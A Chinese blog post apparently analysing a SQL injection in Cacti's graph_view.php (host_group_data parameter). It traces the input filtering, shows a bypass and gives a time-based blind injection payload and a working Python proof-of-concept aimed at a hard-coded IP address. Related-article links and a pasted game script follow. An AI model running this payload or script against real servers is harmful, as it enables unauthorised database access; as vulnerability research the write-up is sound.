view.php 漏洞,Cacti graph_view.php SQL注入漏洞

最新推荐文章于 2023-02-02 19:39:14 发布
最新推荐文章于 2023-02-02 19:39:14 发布
阅读量247 收藏
点赞数
文章标签: view.php 漏洞

存在问题的文件/cacti/graph_view.php:/* ================= input validation ================= */

input_validate_input_number(get_request_var_request('branch_id'));

input_validate_input_number(get_request_var_request('hide'));

input_validate_input_number(get_request_var_request('tree_id'));

input_validate_input_number(get_request_var_request('leaf_id'));

input_validate_input_number(get_request_var_request('rra_id'));

input_validate_input_regex(get_request_var_request('graph_list'), '^([\,0-9]+)$');

input_validate_input_regex(get_request_var_request('graph_add'), '^([\,0-9]+)$');

input_validate_input_regex(get_request_var_request('graph_remove'), '^([\,0-9]+)$');

input_validate_input_regex(get_request_var_request('nodeid'), '^([_a-z0-9]+)$');

/* ==================================================== */

...

switch ($_REQUEST['action']) {

case 'tree_content':

validate_tree_vars(); // attesion here

...

grow_right_pane_tree((isset($_REQUEST['tree_id']) ? $_REQUEST['tree_id'] : 0), (isset($_REQUEST['leaf_id']) ? $_REQUEST['leaf_id'] : 0), (isset($_REQUEST['host_group_data'])

? urldecode($_REQUEST['host_group_data']) : 0));

}

这里我们跟下function grow_right_pane_tree函数,存在于/lib/html_tree.php :

function grow_right_pane_tree($tree_id, $leaf_id, $host_group_data)

{

global $current_user, $config, $graphs_per_page, $graph_timeshifts;

...

$host_group_data_array = explode(':', $host_group_data);

if ($host_group_data_array[0] == 'graph_template') {

$host_group_data_name = 'Graph Template: ' . db_fetch_cell('select name from graph_templates where id=' . $host_group_data_array[1]); //这里很像是可以产生注入的地方

$graph_template_id = $host_group_data_array[1];

}

...

}

这看起来好像是可以产生注入的地方,但是validate_tree_vars()是一个变态的过滤函数function validate_tree_vars() {

/* ================= input validation ================= */

input_validate_input_number(get_request_var_request('graphs'));

input_validate_input_number(get_request_var_request('columns'));

input_validate_input_number(get_request_var_request('page'));

input_validate_input_number(get_request_var_request('tree_id'));

input_validate_input_number(get_request_var_request('leaf_id'));

/* ==================================================== */

/* clean up search string */

if (isset($_REQUEST['filter'])) {

$_REQUEST['filter'] = sanitize_search_string(get_request_var_request('filter'));

}

/* clean up search string */

if (isset($_REQUEST['thumbnails'])) {

$_REQUEST['thumbnails'] = sanitize_search_string(get_request_var_request('thumbnails'));

}

/* clean up host_group_data string */

if (isset($_REQUEST['host_group_data'])) {

$_REQUEST['host_group_data'] = sanitize_search_string(get_request_var_request('host_group_data'));

继续跟踪函数sanitize_search_string,在/lib/functions.php:function sanitize_search_string($string) {

static $drop_char_match = array('^', '$', '', '`', '\'', '"', '|', ',', '?', '+', '[', ']', '{', '}', '#', ';', '!', '=', '*');

static $drop_char_replace = array(' ', ' ', ' ', ' ', '', '', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ');

/* Replace line endings by a space */

$string = preg_replace('/[\n\r]/is', ' ', $string);

/* HTML entities like */

$string = preg_replace('/\b&[a-z]+;\b/', ' ', $string);

/* Remove URL's */

$string = preg_replace('/\b[a-z0-9]+:\/\/[a-z0-9\.\-]+(\/[a-z0-9\?\.%_\-\+=&\/]+)?/', ' ', $string);

/* Filter out strange characters like ^, $, &, change "it's" to "its" */

for($i = 0; $i < count($drop_char_match); $i++) {

$string = str_replace($drop_char_match[$i], $drop_char_replace[$i], $string);

}

return $string;

}

这貌似过滤的很严格,但是可以利用一些mysql的特性去绕过.让sql注入存活过来

首先登陆cacti

然后去请求http://target/cacti/graph_view.php

POST发送Data: ____csrf_magic=sid:b0349195c55bddec2f2be859e0f394539ea4569a,1458781575&host_group_data=graph_template:1 union select case when ord(substring((select version()) from 1 for 1)) between 53 and 53 then sleep(5) else 0 end

如果mysql成功延时5秒,那么version()第一个是5

写个poc来验证下#!/usr/bin/python

# -*- coding: UTF-8 -*-

import httplib

import time

import string

import sys

import random

import urllib

import math

headers = {

'Content-Type': 'application/x-www-form-urlencoded',

'Cookie':

'cacti_zoom=zoomMode%3Dquick%2CzoomOutPositioning%3Dcenter%2CzoomOutFactor%3D2%2CzoomMarkers%3Dtrue%2CzoomTimestamps%3Dauto%2Czoom3rdMouseButton%3Dfalse; Cacti=7a3e072f5ab62febf94fbedda5128fd0'

}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print 'Starting to retrive MySQL DB:'

db = ''

user = ''

for i in range(1, 6):

for payload in payloads:

s = "__csrf_magic=sid:c766dcdb84bc21215af88d112bc9c4f2edc517b4,1458794525&host_group_data=graph_template:1 union select case when ord(substring((select database()) from %s for %s)) between %s and %s then sleep(5) else 0 end" % (

i, i, ord(payload), ord(payload))

conn = httplib.HTTPConnection('133.130.98.98', timeout=60)

conn.request(method='POST',

url='/cacti/graph_view.php?action=tree_content',

body=s,

headers=headers)

start_time = time.time()

conn.getresponse()

conn.close()

print '.',

if time.time() - start_time > 5.0:

db += payload

print '\n\n[In progress]', db,

break

print '\n\n[Done] Current database is %s ' % (db)

bd95248979b67d72cfda207eef90ded5.png

北山南湖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cacti 前台命令注入漏洞
SwBack的博客
05-08 873
Cacti是一个服务器监控与管理平台。基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具. 在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。
cacti不能显示最近7天或最近一月流量图问题解决
weixin_42674358的博客
10-28 1127
cacti不能显示最近7天或最近一月流量图问题解决 graph_image.php中的以上代码中限制了时间戳的最大时间是1600000000,此时间为2020-09-13 20:26:40。 只要是把这个限制值去掉或者改大就可以 修改前代码: if (!empty($_GET["graph_start"]) && $_GET["graph_start"] < 1600000000) { $graph_data_array["graph_start"] = $_GET["graph_s
cacti graphs new.php,cacti后台SQL注入漏洞 --解决
weixin_33315077的博客
03-27 542
cacti后台SQL注入漏洞简介cacti后台SQL注入漏洞cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。解决方法在第4步1. 漏洞描述other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the ...
cacti lib/rrd.php rrdtoll 1343,Cacti SQL注入漏洞(CNVD-2015-08486)
weixin_42651748的博客
04-01 231
### 0x01 漏洞简述CactiCacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。### 0x02 漏洞细节漏洞存在于文件/cacti-0.8.8f/graph....
关于nginx和cacti的一次排错经历
weixin_30633949的博客
05-09 87
关于nginx和cacti的一次排错经历 星期一早上刚到公司,打开邮箱就看到了停电通知,是上星期六晚上公司机房停电了。照例打开公司的cacti监控,查看服务器状态情况,突然页面出现个502 bad gateway。想着肯定是机房停电导致的。这个cacti是安装在一个比较老的机器上,系统为centos5.5.那个机器是另一个同事配置的,在上面跑的有数据库、nginx、php以及...
cacti-1.1.20.zip_cacti 1.2.3模板_cacti;auth.php_网络流量分析工具
07-15
是一款基于PHP、MySQL、SNMP及RRDTool开发的网络流量监测图形分析工具,通过snmpget来获取数据,使用RRDtool绘画图形,提供了非常强大的数据和用户管理功能。
cacti-0.8.7e.zip_WEB开发_PHP_
08-11
RE2网站在线管理PHP文本,ASP编程学习源码,php网站制作参考资料。
Cacti-for-Windows-v0.8.7d.rar_Cacti_windows 8
09-20
Cacti for Windows(网络流量监测图形分析工具) v0.8.7d一款用于监测网络流量的web应用windows版
cacti_graph_template_interface_status.xml
02-27
cacti_graph_template_interface_status.xml
cacti_Manual_chs.rar_网络编程_WORD_
08-12
cacti网络监控系统使用手册(中文翻译)
CVE-2020-8813:Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用
03-08
CVE-2020-8813 Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用 Cacti v1.2.8身份验证前远程执行代码 仙人掌v1.2.8验证后远程执行代码
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 3912
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
view.php 漏洞,phpMyAdmin view_create.php 跨站脚本漏洞
weixin_31174671的博客
03-10 160
CocoaPods 使用为什么要使用这个玩意呢,最近在使用swift开发项目,使用 swift 开源库的时候,在git上下载后居然不知道哪些是必须文件,还要思考下,看看哪些是需要的(不像原来oc开源库,一目了然),网上使用d ...Java程序员的日常——SpringMVC&plus;Mybatis开发流程、推荐系统今天大部分时间都在写业务代码,然后算是从无到有的配置了下spring与my...
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 3678
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。
cacti后台SQL注入漏洞 --解决
weixin_33755649的博客
03-11 1070
cacti后台SQL注入漏洞 简介 cacti后台SQL注入漏洞 cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。 解决方法在第4步 1. 漏洞描述 other SQL injection vulnerability via graphs_new.php in cact...
Cacti 'graph_xport.php' SQL注入漏洞
weixin_30765319的博客
04-03 170
漏洞版本: Cacti < 0.8.8b 漏洞描述: Bugtraq ID:66555 Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。 Cacti 'graph_xport.php'存在SQL注入漏洞,成功利用后可使攻击者执行未授权数据库操作。 <* 参考 http://www.securityfo...
java 解决正则注入漏洞
tcmmx1993的博客
12-14 483
示例代码 // Sanitize search string 对检测字符串做预处理 StringBuilder sb = new StringBuilder(search.length()); for (int i = 0; i < search.length(); ++i) { char ch = search.charAt(i); if (Character.isLetterOrDigit(ch) || ch == ' ' || ch == '\'') { sb.append(c.
开源GraphView的使用--数据统计
DouDouLee_blog的博客
07-01 4732
最近做室内定位需要绘出加速度传感器输出的三个方向的加速度曲线,找到了开源https://github.com/jjoe64/GraphView-Demos,省去了要重新学MatLab *=*。 在http://www.android-graphview.org/download--getting-started.html下载.jar包。 1、GraphView的使用和普通View的使用相同。在
import cfg import sys import random import pygame from 期末作业.小恐龙跑酷.modules import GameStartInterface, Scoreboard, Dinosaur, Ground, Cloud, Cactus, Ptera, \ GameEndInterface '''main''' def main(highest_score): # 游戏初始化 pygame.init() screen = pygame.display.set_mode(cfg.SCREENSIZE) pygame.display.set_caption('恐怖龙跑酷') # 导入所有声音文件 sounds = {} for key, value in cfg.AUDIO_PATHS.items (): sounds[key] = pygame.mixer.Sound(value) # 游戏开始界面 GameStartInterface(screen, sounds, cfg) # 确定一些游戏中必须的元素和变化 score = 0 score_board = Scoreboard(cfg.IMAGE_PATHS[' numbers'], position=(534, 15), bg_c​​olor=cfg.BACKGROUND_COLOR) highest_score = highest_score highest_score_board = 记分牌(cfg.IMAGE_PATHS['numbers'], position=(435, 15), bg_c​​olor=cfg.BACKGROUND_COLOR, is_highest=True) dino = Dinosaur(cfg.IMAGE_PATHS['dino']) ground = Ground(cfg.IMAGE_PATHS['ground'], position=(0, cfg.SCREENSIZE[1])) 云精灵组= pygame.sprite .Group() cactus_sprites_group = pygame.sprite.Group() ptera_sprites_group = pygame.sprite.Group() add_obstacle_timer = 0 score_timer = 0 # 游戏主跟随环 clock = pygame.time.Clock() while True: for event in pygame.event .get(): if event.type == pygame.QUIT: pygame.quit() sys.exit() elif event.type == pygame.KEYDOWN: if event.key == pygame.K_SPACE or event.key == pygame.K_UP: dino.jump(sounds) elif event.key == pygame.K_DOWN: dino.duck() elif event.type == pygame.KEYUP and event.key == pygame.K_DOWN: dino.unduck() screen.fill(cfg.BACKGROUND_COLOR) # --随机添加云 if len(cloud_sprites_group) < 5 and random.randrange(0, 300) == 10: cloud_sprites_group.add(Cloud(cfg.IMAGE_PATHS['cloud'], position=( cfg.SCREENSIZE[0], random.randrange(30, 75)))) # --随机添加仙人掌/飞龙 add_obstacle_timer += 1 if add_obstacle_timer > random.randrange(50, 150): add_obstacle_timer = 0 random_value = random.randrange(0, 10) 如果 random_value >= 5 且 random_value <= 7: cactus_sprites_group.add(Cactus(cfg.IMAGE_PATHS['cacti']))否则:position_ys = [cfg.SCREENSIZE[1] * 0.82,cfg.SCREENSIZE[1] * 0.75,cfg.SCREENSIZE[1] * 0.60,cfg.SCREENSIZE[1] * 0。20] ptera_sprites_group.add(Ptera(cfg.IMAGE_PATHS['ptera'], position=(600, random.choice(position_ys)))) # --更新游戏元素 dino.update() ground.update() cloud_sprites_group.update () cactus_sprites_group.update() ptera_sprites_group.update() score_timer += 1 如果score_timer > (cfg.FPS // 12): score_timer = 0 score += 1 score = min(score, 99999) 如果score > highest_score: highest_score = score if score % 100 == 0: sounds['point'].play() if score % 1000 == 0: ground.speed -= 1 对于 cloud_sprites_group 中的项目:item.speed -= 1 对于 cactus_sprites_group 中的项目:item .speed -= 1 for item in ptera_sprites_group: item.speed -= 1 # --撞击检测 for item in cactus_sprites_group: if pygame.sprite.collide_mask(dino, item): dino.die(sounds) for item in ptera_sprites_group: if pygame .sprite.collide_mask(dino, item): dino.die(sounds) # --将游戏元素画到屏幕上 dino.draw(screen) ground.draw(screen) cloud_sprites_group.draw(screen) cactus_sprites_group.draw(screen) ptera_sprites_group.draw(screen) score_board.set(score) highest_score_board.set(highest_score) score_board.draw(screen) highest_score_board.draw(screen) # --更新屏幕 pygame.display.update() clock.tick(cfg.FPS) # --游戏是否结束 if dino.is_dead:break # 游戏结束界面 return GameEndInterface(screen, cfg), highest_score '''run''' ifname == ' main ': highest_score = 0 while True: flag, highest_score = main(highest_score) if not flag: break运行注解代码
最新发布
06-03
这是一段 Python 代码,实现了一个小恐龙跑酷游戏。在游戏中,玩家需要控制小恐龙躲避障碍物并跳跃。代码中使用了 Pygame 库来实现游戏画面和声音效果,其中包括了游戏开始界面、游戏主循环和游戏结束界面。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值